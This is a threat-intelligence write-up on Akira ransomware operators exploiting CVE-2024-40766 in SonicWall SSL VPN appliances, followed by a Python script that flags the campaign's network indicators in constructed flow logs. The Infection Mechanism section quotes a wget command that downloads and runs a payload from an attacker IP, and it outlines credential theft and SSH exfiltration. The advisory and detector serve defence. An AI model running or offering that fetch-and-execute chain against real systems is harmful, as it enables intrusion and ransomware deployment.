Threat actors have reemerged in mid-2025 leveraging previously disclosed vulnerabilities in SonicWall SSL VPN appliances to deploy Akira ransomware on enterprise networks.
Beginning in July, multiple incidents of initial access via unpatched SonicWall devices were reported across North America and EMEA. Attackers exploited CVE-2024-40766, an access control flaw in SonicOS versions up to 7.0.1-5035, enabling unauthenticated remote code execution.
Once inside a network, adversaries performed reconnaissance, credential harvesting, and lateral movement before detonating the ransomware payload.
By August, the pace of attacks accelerated, with affected organizations spanning manufacturing, education, and healthcare sectors.
Data exfiltration often preceded encryption, with threat actors siphoning sensitive files to rare external SSH endpoints before network encryption commenced.
Darktrace analysts identified multiple signs of compromise, including anomalous DCE-RPC requests to the epmapper service and unexpected WinRM sessions to domain controllers, long before ransom notes appeared.
Their Managed Detection and Response (MDR) platform linked these early indicators to the broader Akira campaign, enabling rapid incident triage and containment.
The Akira ransomware strain, first observed in March 2023, has evolved from Windows-only targeting to include Linux variants affecting VMware ESXi hosts, making it an attractive option for attackers seeking maximum disruption.
Under its Ransomware-as-a-Service model, affiliates deploy double-extortion tactics, encrypting file systems and threatening public release of exfiltrated data.
In each SonicWall SSL VPN compromise, operators ensured persistence by reusing stolen credentials and exploiting misconfigurations in Virtual Office Portal setups, bypassing multi-factor configurations even on patched devices.
Infection Mechanism
The initial compromise typically begins with exploitation of CVE-2024-40766 in SonicWall SSL VPN.
Attackers send crafted HTTP requests to the vulnerable login.host endpoint, bypassing authentication controls.
Once a foothold is established, a malicious payload named vmwaretools is downloaded from a hostile cloud endpoint using a simple wget command:
wget http[:]//137.184.243.69/vmwaretools -O /tmp/vmwaretools
chmod +x /tmp/vmwaretools
/tmp/vmwaretools
This payload installs a loader that registers a backdoor service and harvests administrative credentials via Kerberos PKINIT and UnPAC-the-hash techniques, extracting NTLM hashes without triggering standard credential audit logs.
After credential extraction, operators initiate lateral movement to ESXi servers over RDP and SSH, exfiltrate data via SSH to endpoint 66.165.243.39, then execute the ransomware binary on Windows and ESXi hosts.
Maintaining stealth, the loader disables local logging and leverages legitimate administrative tools such as WinRM and Rclone for intra-network communication.
By the time encryption begins, attackers have already ensured persistence through backdoored services and stolen credentials for future access.
Organizations are urged to apply SonicWall patches released in August 2024, enforce strict credential hygiene, and monitor for anomalous external SSH traffic.
Early detection of unusual DCE-RPC, WinRM, and certificate download events remains critical to disrupting this evolving Akira campaign.
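As an added illustration of the detection guidance above (the rare external SSH endpoints, unexpected WinRM sessions to domain controllers and anomalous DCE-RPC epmapper activity named earlier, and the closing advice to monitor for them), the following Python script triages a window of network flow records against those indicators. It is example code written for this page, not code from the article or from Darktrace. The tab-separated log layout, the domain controller and jump-host addresses, the approved SSH peer, the fan-out threshold and every log line are constructed assumptions; the only values taken from the article are the two IP addresses it quotes as the payload host and the SSH exfiltration endpoint.

```python
"""Triage of flow records for the early Akira indicators the article names:
rare external SSH endpoints, unexpected WinRM sessions to domain controllers,
and anomalous DCE-RPC endpoint-mapper (epmapper) activity. Every log line
below is constructed; the tab-separated layout (ts, src, dst, dport, proto,
orig_bytes) is a simplified Zeek conn.log shape and is an assumption."""
from collections import defaultdict
from ipaddress import ip_address

# Addresses quoted in the article: payload host and SSH exfiltration endpoint.
ARTICLE_IOCS = {"137.184.243.69", "66.165.243.39"}

# Hypothetical environment knowledge a SOC would keep (all constructed).
DOMAIN_CONTROLLERS = {"10.0.0.10", "10.0.0.11"}
ADMIN_JUMP_HOSTS = {"10.0.5.5"}            # hosts permitted to open WinRM to a DC
KNOWN_SSH_DESTINATIONS = {"203.0.113.40"}  # approved external SSH peers (documentation range)
EPMAPPER_FANOUT_THRESHOLD = 5              # distinct epmapper targets before flagging

# Constructed sample log: one workstation probes epmapper on five hosts,
# opens WinRM to a DC, then pushes a large volume over SSH to the exfil IoC.
SAMPLE_LOG = """\
# ts\tsrc\tdst\tdport\tproto\torig_bytes
1.0\t10.0.3.7\t10.0.0.10\t135\ttcp\t400
1.1\t10.0.3.7\t10.0.0.11\t135\ttcp\t400
1.2\t10.0.3.7\t10.0.0.12\t135\ttcp\t400
1.3\t10.0.3.7\t10.0.0.13\t135\ttcp\t400
1.4\t10.0.3.7\t10.0.0.14\t135\ttcp\t400
2.0\t10.0.3.7\t10.0.0.10\t5985\ttcp\t9000
3.0\t10.0.5.5\t10.0.0.10\t5985\ttcp\t1200
4.0\t10.0.3.7\t66.165.243.39\t22\ttcp\t850000000
5.0\t10.0.4.2\t203.0.113.40\t22\ttcp\t3000
"""


def parse_log(text):
    """Parse tab-separated flow lines into dicts; '#' lines and blanks are skipped."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, proto, orig_bytes = line.split("\t")
        flows.append({"ts": float(ts), "src": src, "dst": dst,
                      "dport": int(dport), "proto": proto,
                      "orig_bytes": int(orig_bytes)})
    return flows


def is_external(ip):
    """True for addresses outside the private/special ranges ipaddress knows
    (RFC 1918 and the documentation nets both count as non-external here)."""
    return not ip_address(ip).is_private


def triage(flows):
    """Return (rule, src, dst, detail) alerts: per-flow rules in log order,
    then the epmapper fan-out rule, which needs the whole window."""
    alerts = []
    epmapper_targets = defaultdict(set)
    for f in flows:
        src, dst, dport = f["src"], f["dst"], f["dport"]
        # Watchlist hit on either side of the flow.
        if src in ARTICLE_IOCS or dst in ARTICLE_IOCS:
            alerts.append(("ioc-match", src, dst, "address listed in campaign reporting"))
        # SSH to an external peer nobody has approved: exfiltration pattern.
        if dport == 22 and is_external(dst) and dst not in KNOWN_SSH_DESTINATIONS:
            alerts.append(("rare-external-ssh", src, dst, f"{f['orig_bytes']} bytes sent"))
        # WinRM into a DC from anything other than the admin jump hosts.
        if dport in (5985, 5986) and dst in DOMAIN_CONTROLLERS and src not in ADMIN_JUMP_HOSTS:
            alerts.append(("unexpected-winrm-to-dc", src, dst, "source is not an admin jump host"))
        # Collect epmapper (TCP/135) targets per source for the fan-out check.
        if dport == 135:
            epmapper_targets[src].add(dst)
    for src, targets in sorted(epmapper_targets.items()):
        if len(targets) >= EPMAPPER_FANOUT_THRESHOLD:
            alerts.append(("dcerpc-epmapper-fanout", src, "*",
                           f"{len(targets)} distinct epmapper targets"))
    return alerts


if __name__ == "__main__":
    for rule, src, dst, detail in triage(parse_log(SAMPLE_LOG)):
        print(f"{rule:24} {src:>15} -> {dst:<15} {detail}")
```

Run against the constructed log, the script raises four alerts, all on the same workstation: the WinRM session to a domain controller, the watchlist hit and the rare external SSH flow to the exfiltration address, and the epmapper fan-out across five hosts. The jump host's WinRM session and the SSH flow to the approved peer produce nothing. In a real deployment the allowlists and the fan-out threshold would come from the environment's baseline rather than from constants, and the rules would be fed from the flow sensor's own export rather than a string.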